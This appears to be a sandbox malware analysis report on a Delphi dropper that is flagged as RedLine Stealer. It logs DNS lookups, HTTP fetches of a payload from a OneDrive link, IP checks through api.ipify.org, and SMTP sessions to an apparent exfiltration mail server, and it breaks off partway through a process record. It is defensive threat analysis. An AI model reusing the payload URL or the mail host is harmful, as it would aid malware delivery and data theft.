                                                                                                                                          Jan 24, 2024 21:32:31.485085011 CET49752587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:31.687556982 CET58749752185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:31.687575102 CET58749752185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:31.687587976 CET58749752185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:31.687625885 CET58749752185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:31.687638998 CET58749752185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:31.687817097 CET58749752185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:31.687870979 CET58749752185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:31.691236019 CET58749752185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:31.737427950 CET49752587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:31.941103935 CET58749752185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:31.941458941 CET49752587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:31.942888975 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:32.151849985 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:32.151961088 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:32.375822067 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:32.376234055 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:32.585372925 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:32.585629940 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:32.795686960 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:32.796087980 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:33.016165972 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:33.016185045 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:33.016196012 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:33.016207933 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:33.016366959 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:33.016366959 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:33.018265009 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:33.019783020 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:33.228807926 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:33.230091095 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:33.439322948 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:33.439718008 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:33.649218082 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:33.649627924 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:33.866523981 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:33.867002010 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:34.075985909 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:34.076378107 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:34.298979998 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:34.299403906 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:34.508594036 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:34.509021044 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:34.509021044 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:34.509021044 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:34.509021044 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          Jan 24, 2024 21:32:34.717880011 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:34.718055010 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:34.718065977 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:34.718075037 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:34.721167088 CET58749753185.56.136.50192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:34.771966934 CET49753587192.168.2.4185.56.136.50
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jan 24, 2024 21:31:55.800633907 CET5632553192.168.2.41.1.1.1
                                                                                                                                          Jan 24, 2024 21:31:56.846369982 CET5115253192.168.2.41.1.1.1
                                                                                                                                          Jan 24, 2024 21:32:00.959964037 CET5902253192.168.2.41.1.1.1
                                                                                                                                          Jan 24, 2024 21:32:01.078908920 CET53590221.1.1.1192.168.2.4
                                                                                                                                          Jan 24, 2024 21:32:02.886241913 CET6245753192.168.2.41.1.1.1
                                                                                                                                          Jan 24, 2024 21:32:03.319752932 CET53624571.1.1.1192.168.2.4
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                          Jan 24, 2024 21:31:55.800633907 CET192.168.2.41.1.1.10x85a8Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:31:56.846369982 CET192.168.2.41.1.1.10x5e46Standard query (0)ypfgrg.sn.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:32:00.959964037 CET192.168.2.41.1.1.10x3d66Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:32:02.886241913 CET192.168.2.41.1.1.10x6612Standard query (0)mail.oripam.xyzA (IP address)IN (0x0001)false
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                          Jan 24, 2024 21:31:55.920281887 CET1.1.1.1192.168.2.40x85a8No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:31:55.920281887 CET1.1.1.1192.168.2.40x85a8No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:31:55.920281887 CET1.1.1.1192.168.2.40x85a8No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:31:55.920281887 CET1.1.1.1192.168.2.40x85a8No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:31:55.920281887 CET1.1.1.1192.168.2.40x85a8No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:31:57.023960114 CET1.1.1.1192.168.2.40x5e46No error (0)ypfgrg.sn.files.1drv.comsn-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:31:57.023960114 CET1.1.1.1192.168.2.40x5e46No error (0)sn-files.fe.1drv.comodc-sn-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:32:01.078908920 CET1.1.1.1192.168.2.40x3d66No error (0)api.ipify.orgapi4.ipify.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:32:01.078908920 CET1.1.1.1192.168.2.40x3d66No error (0)api4.ipify.org173.231.16.75A (IP address)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:32:01.078908920 CET1.1.1.1192.168.2.40x3d66No error (0)api4.ipify.org64.185.227.156A (IP address)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:32:01.078908920 CET1.1.1.1192.168.2.40x3d66No error (0)api4.ipify.org104.237.62.211A (IP address)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:32:03.319752932 CET1.1.1.1192.168.2.40x6612No error (0)mail.oripam.xyzoripam.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                                                                          Jan 24, 2024 21:32:03.319752932 CET1.1.1.1192.168.2.40x6612No error (0)oripam.xyz185.56.136.50A (IP address)IN (0x0001)false
                                                                                                                                          • onedrive.live.com
                                                                                                                                          • api.ipify.org
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          0192.168.2.44973013.107.139.114437048C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-01-24 20:31:56 UTC213OUTGET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                          Host: onedrive.live.com
                                                                                                                                          2024-01-24 20:31:56 UTC1176INHTTP/1.1 302 Found
                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Expires: -1
                                                                                                                                          Location: https://ypfgrg.sn.files.1drv.com/y4mbejU0zcnLb8KIWNqfLsU3N_rsqNxx32XcbH8LaSJJsucoEjYDeg2UbWhApyywdORi-rM-BIJEnDaUVVVpL2Pu2QtMXxLbMBmk-viex5mWSfWxIEYocoTRxBY4zUuNOGX3XflaqQCpgOUU4Y4XzXQO1EY1MaqrdX3eJo-aHnfQCB2m2Qu-tLfo3JigWTLkHJo0rie07s3ZbKrnZBg3n-aUA/255_Clmgncrswyc?download&psid=1
                                                                                                                                          Set-Cookie: E=P:bXssghsd3Ig=:AM0Pzu2CG8A8pDIOAIYJ640M8XKnpRlKlXJfQ7UTitA=:F; domain=.live.com; path=/
                                                                                                                                          Set-Cookie: xid=9cd6455a-c95a-4ca6-8a8d-9baac9895532&&ODSP-ODWEB-ODCF&56; domain=.live.com; path=/
                                                                                                                                          Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                          Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Jan-2024 18:51:56 GMT; path=/
                                                                                                                                          Set-Cookie: wla42=; domain=live.com; expires=Wed, 31-Jan-2024 20:31:56 GMT; path=/
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-MSNServer: 6fb577fb65-nkcwq
                                                                                                                                          X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                          X-MSEdge-Ref: Ref A: C09A13CB73AB4E73B5E42DDF71C08B1A Ref B: BN3EDGE0614 Ref C: 2024-01-24T20:31:56Z
                                                                                                                                          Date: Wed, 24 Jan 2024 20:31:56 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          1192.168.2.449732173.231.16.754435660C:\Users\Public\Libraries\srcngmlC.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-01-24 20:32:01 UTC155OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                          Host: api.ipify.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-01-24 20:32:01 UTC157INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.25.1
                                                                                                                                          Date: Wed, 24 Jan 2024 20:32:01 GMT
                                                                                                                                          Content-Type: text/plain
                                                                                                                                          Content-Length: 12
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Origin
                                                                                                                                          2024-01-24 20:32:01 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34
                                                                                                                                          Data Ascii: 81.181.57.74


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          2192.168.2.44973713.107.139.114436472C:\Users\Public\Libraries\Clmgncrs.PIF
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-01-24 20:32:12 UTC213OUTGET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                          Host: onedrive.live.com
                                                                                                                                          2024-01-24 20:32:12 UTC1176INHTTP/1.1 302 Found
                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Expires: -1
                                                                                                                                          Location: https://ypfgrg.sn.files.1drv.com/y4msDhUEASrFMIPv49fXAzT4qs4bguIHP4CCd0btJ0hrPPN2V-ZqBRXsYtcVL3jQXO7r49r719ro5RJTPzdUGbNpVlDu6dxs6YKOfnn5vu8QA0rHm8n14Q90NovCLmZqqoN8XVzOwGcF1aGZm0G1c8M1871I6jKNz42Ys7HBxX54CPR5mfvEVTfIT3VZFI557mWsnf1zyAKULP1oIZfoepMlQ/255_Clmgncrswyc?download&psid=1
                                                                                                                                          Set-Cookie: E=P:ngmnixsd3Ig=:YpGhyMKxUK5CqKIbdpklzOKv5SVDTN3ZiBH7lK6M4M4=:F; domain=.live.com; path=/
                                                                                                                                          Set-Cookie: xid=a0d175d1-2acf-4f55-8d3e-fbe93f7f16e6&&ODSP-ODWEB-ODCF&56; domain=.live.com; path=/
                                                                                                                                          Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                          Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Jan-2024 18:52:12 GMT; path=/
                                                                                                                                          Set-Cookie: wla42=; domain=live.com; expires=Wed, 31-Jan-2024 20:32:12 GMT; path=/
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-MSNServer: 6fb577fb65-mktkw
                                                                                                                                          X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                          X-MSEdge-Ref: Ref A: DA2F59C871A44681BFDDEB5FF5524C90 Ref B: BN3EDGE0406 Ref C: 2024-01-24T20:32:12Z
                                                                                                                                          Date: Wed, 24 Jan 2024 20:32:12 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          3192.168.2.449744173.231.16.754436348C:\Users\Public\Libraries\srcngmlC.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-01-24 20:32:16 UTC155OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                          Host: api.ipify.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-01-24 20:32:17 UTC157INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.25.1
                                                                                                                                          Date: Wed, 24 Jan 2024 20:32:17 GMT
                                                                                                                                          Content-Type: text/plain
                                                                                                                                          Content-Length: 12
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Origin
                                                                                                                                          2024-01-24 20:32:17 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34
                                                                                                                                          Data Ascii: 81.181.57.74


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          4192.168.2.44974713.107.139.114431028C:\Users\Public\Libraries\Clmgncrs.PIF
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-01-24 20:32:19 UTC213OUTGET /download?resid=31BDC6BCA3597F9E%21304&authkey=!ACV5OIy1dzif_BE HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Accept: */*
                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                          Host: onedrive.live.com
                                                                                                                                          2024-01-24 20:32:19 UTC1176INHTTP/1.1 302 Found
                                                                                                                                          Cache-Control: no-cache, no-store
                                                                                                                                          Pragma: no-cache
                                                                                                                                          Content-Type: text/html
                                                                                                                                          Expires: -1
                                                                                                                                          Location: https://ypfgrg.sn.files.1drv.com/y4msfS_e270PF1WCCn3T5ASjYfsXiOpfH10UgaOZ4PL-nRYDMKHbDGEjKzr8Rs0CmTqGLk2aEyd5TVrICQv6GF9S2SwwvIpSEQuY_jr0GwrGYS7GbcrTiyFcPIT_dNV5k0WL0N15uggdXDG4HTwvOSbI_VKUqd9CT55TJnIYdam_1kSAnAuaB0AGhd4VHLoBDsmR9mIlJcWACTKxswzqg9STg/255_Clmgncrswyc?download&psid=1
                                                                                                                                          Set-Cookie: E=P:vk3Tjxsd3Ig=:NxxprAJVbc4yysa0k+z3XY6QuC7kaw8c3v+EIjXgk4c=:F; domain=.live.com; path=/
                                                                                                                                          Set-Cookie: xid=bbac1309-0994-4640-a84e-c37587011320&&ODSP-ODWEB-ODCF&56; domain=.live.com; path=/
                                                                                                                                          Set-Cookie: xidseq=1; domain=.live.com; path=/
                                                                                                                                          Set-Cookie: LD=; domain=.live.com; expires=Wed, 24-Jan-2024 18:52:19 GMT; path=/
                                                                                                                                          Set-Cookie: wla42=; domain=live.com; expires=Wed, 31-Jan-2024 20:32:19 GMT; path=/
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                          X-MSNServer: 6fb577fb65-5v6dj
                                                                                                                                          X-ODWebServer: nameastus2946819-odwebpl
                                                                                                                                          X-Cache: CONFIG_NOCACHE
                                                                                                                                          X-MSEdge-Ref: Ref A: 29C88B9992624A9E8D31B04D81C2D6DB Ref B: BN3EDGE1113 Ref C: 2024-01-24T20:32:19Z
                                                                                                                                          Date: Wed, 24 Jan 2024 20:32:19 GMT
                                                                                                                                          Connection: close
                                                                                                                                          Content-Length: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          5192.168.2.449750173.231.16.754436164C:\Users\Public\Libraries\srcngmlC.pif
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2024-01-24 20:32:23 UTC155OUTGET / HTTP/1.1
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                          Host: api.ipify.org
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          2024-01-24 20:32:23 UTC157INHTTP/1.1 200 OK
                                                                                                                                          Server: nginx/1.25.1
                                                                                                                                          Date: Wed, 24 Jan 2024 20:32:23 GMT
                                                                                                                                          Content-Type: text/plain
                                                                                                                                          Content-Length: 12
                                                                                                                                          Connection: close
                                                                                                                                          Vary: Origin
                                                                                                                                          2024-01-24 20:32:23 UTC12INData Raw: 38 31 2e 31 38 31 2e 35 37 2e 37 34
                                                                                                                                          Data Ascii: 81.181.57.74


                                                                                                                                          TimestampSource PortDest PortSource IPDest IPCommands
                                                                                                                                          Jan 24, 2024 21:32:03.750426054 CET58749733185.56.136.50192.168.2.4220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:02 +0530
                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                          Jan 24, 2024 21:32:03.750741005 CET49733587192.168.2.4185.56.136.50EHLO 065367
                                                                                                                                          Jan 24, 2024 21:32:03.953141928 CET58749733185.56.136.50192.168.2.4250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74]
                                                                                                                                          250-SIZE 52428800
                                                                                                                                          250-8BITMIME
                                                                                                                                          250-PIPELINING
                                                                                                                                          250-PIPECONNECT
                                                                                                                                          250-STARTTLS
                                                                                                                                          250 HELP
                                                                                                                                          Jan 24, 2024 21:32:03.953315973 CET49733587192.168.2.4185.56.136.50STARTTLS
                                                                                                                                          Jan 24, 2024 21:32:04.156770945 CET58749733185.56.136.50192.168.2.4220 TLS go ahead
                                                                                                                                          Jan 24, 2024 21:32:06.793358088 CET58749734185.56.136.50192.168.2.4220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:05 +0530
                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                          Jan 24, 2024 21:32:06.793535948 CET49734587192.168.2.4185.56.136.50EHLO 065367
                                                                                                                                          Jan 24, 2024 21:32:07.003293991 CET58749734185.56.136.50192.168.2.4250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74]
                                                                                                                                          250-SIZE 52428800
                                                                                                                                          250-8BITMIME
                                                                                                                                          250-PIPELINING
                                                                                                                                          250-PIPECONNECT
                                                                                                                                          250-STARTTLS
                                                                                                                                          250 HELP
                                                                                                                                          Jan 24, 2024 21:32:07.003446102 CET49734587192.168.2.4185.56.136.50STARTTLS
                                                                                                                                          Jan 24, 2024 21:32:07.213927031 CET58749734185.56.136.50192.168.2.4220 TLS go ahead
                                                                                                                                          Jan 24, 2024 21:32:09.930634975 CET58749735185.56.136.50192.168.2.4220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:09 +0530
                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                          Jan 24, 2024 21:32:10.004050016 CET49735587192.168.2.4185.56.136.50EHLO 065367
                                                                                                                                          Jan 24, 2024 21:32:10.210422993 CET58749735185.56.136.50192.168.2.4250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74]
                                                                                                                                          250-SIZE 52428800
                                                                                                                                          250-8BITMIME
                                                                                                                                          250-PIPELINING
                                                                                                                                          250-PIPECONNECT
                                                                                                                                          250-STARTTLS
                                                                                                                                          250 HELP
                                                                                                                                          Jan 24, 2024 21:32:10.210701942 CET49735587192.168.2.4185.56.136.50STARTTLS
                                                                                                                                          Jan 24, 2024 21:32:10.417320013 CET58749735185.56.136.50192.168.2.4220 TLS go ahead
                                                                                                                                          Jan 24, 2024 21:32:18.434108973 CET58749745185.56.136.50192.168.2.4220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:17 +0530
                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                          Jan 24, 2024 21:32:18.434583902 CET49745587192.168.2.4185.56.136.50EHLO 065367
                                                                                                                                          Jan 24, 2024 21:32:18.639543056 CET58749745185.56.136.50192.168.2.4250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74]
                                                                                                                                          250-SIZE 52428800
                                                                                                                                          250-8BITMIME
                                                                                                                                          250-PIPELINING
                                                                                                                                          250-PIPECONNECT
                                                                                                                                          250-STARTTLS
                                                                                                                                          250 HELP
                                                                                                                                          Jan 24, 2024 21:32:18.639930010 CET49745587192.168.2.4185.56.136.50STARTTLS
                                                                                                                                          Jan 24, 2024 21:32:18.845571995 CET58749745185.56.136.50192.168.2.4220 TLS go ahead
                                                                                                                                          Jan 24, 2024 21:32:21.463428020 CET58749749185.56.136.50192.168.2.4220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:20 +0530
                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                          Jan 24, 2024 21:32:21.463587046 CET49749587192.168.2.4185.56.136.50EHLO 065367
                                                                                                                                          Jan 24, 2024 21:32:21.668500900 CET58749749185.56.136.50192.168.2.4250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74]
                                                                                                                                          250-SIZE 52428800
                                                                                                                                          250-8BITMIME
                                                                                                                                          250-PIPELINING
                                                                                                                                          250-PIPECONNECT
                                                                                                                                          250-STARTTLS
                                                                                                                                          250 HELP
                                                                                                                                          Jan 24, 2024 21:32:21.671657085 CET49749587192.168.2.4185.56.136.50STARTTLS
                                                                                                                                          Jan 24, 2024 21:32:21.877394915 CET58749749185.56.136.50192.168.2.4220 TLS go ahead
                                                                                                                                          Jan 24, 2024 21:32:25.291779995 CET58749751185.56.136.50192.168.2.4220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:24 +0530
                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                          Jan 24, 2024 21:32:25.291975021 CET49751587192.168.2.4185.56.136.50EHLO 065367
                                                                                                                                          Jan 24, 2024 21:32:25.494040966 CET58749751185.56.136.50192.168.2.4250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74]
                                                                                                                                          250-SIZE 52428800
                                                                                                                                          250-8BITMIME
                                                                                                                                          250-PIPELINING
                                                                                                                                          250-PIPECONNECT
                                                                                                                                          250-STARTTLS
                                                                                                                                          250 HELP
                                                                                                                                          Jan 24, 2024 21:32:25.495248079 CET49751587192.168.2.4185.56.136.50STARTTLS
                                                                                                                                          Jan 24, 2024 21:32:25.698338985 CET58749751185.56.136.50192.168.2.4220 TLS go ahead
                                                                                                                                          Jan 24, 2024 21:32:28.391747952 CET58749752185.56.136.50192.168.2.4220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:27 +0530
                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                          Jan 24, 2024 21:32:29.414364100 CET49752587192.168.2.4185.56.136.50EHLO 065367
                                                                                                                                          Jan 24, 2024 21:32:29.617675066 CET58749752185.56.136.50192.168.2.4250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74]
                                                                                                                                          250-SIZE 52428800
                                                                                                                                          250-8BITMIME
                                                                                                                                          250-PIPELINING
                                                                                                                                          250-PIPECONNECT
                                                                                                                                          250-STARTTLS
                                                                                                                                          250 HELP
                                                                                                                                          Jan 24, 2024 21:32:29.617830992 CET49752587192.168.2.4185.56.136.50STARTTLS
                                                                                                                                          Jan 24, 2024 21:32:29.822175980 CET58749752185.56.136.50192.168.2.4220 TLS go ahead
                                                                                                                                          Jan 24, 2024 21:32:32.375822067 CET58749753185.56.136.50192.168.2.4220-terminal7.veeblehosting.com ESMTP Exim 4.96.2 #2 Thu, 25 Jan 2024 02:02:31 +0530
                                                                                                                                          220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                          220 and/or bulk e-mail.
                                                                                                                                          Jan 24, 2024 21:32:32.376234055 CET49753587192.168.2.4185.56.136.50EHLO 065367
                                                                                                                                          Jan 24, 2024 21:32:32.585372925 CET58749753185.56.136.50192.168.2.4250-terminal7.veeblehosting.com Hello 065367 [81.181.57.74]
                                                                                                                                          250-SIZE 52428800
                                                                                                                                          250-8BITMIME
                                                                                                                                          250-PIPELINING
                                                                                                                                          250-PIPECONNECT
                                                                                                                                          250-STARTTLS
                                                                                                                                          250 HELP
                                                                                                                                          Jan 24, 2024 21:32:32.585629940 CET49753587192.168.2.4185.56.136.50STARTTLS
                                                                                                                                          Jan 24, 2024 21:32:32.795686960 CET58749753185.56.136.50192.168.2.4220 TLS go ahead

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Click to jump to process

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:21:31:54
                                                                                                                                          Start date:24/01/2024
                                                                                                                                          Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'693'184 bytes
                                                                                                                                          MD5 hash:39AD433C9BA920E7FD0961C66AC7079E
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:Borland Delphi
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1705935072.000000007EA90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.1683696452.000000007EA40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:21:31:57
                                                                                                                                          Start date:24/01/2024
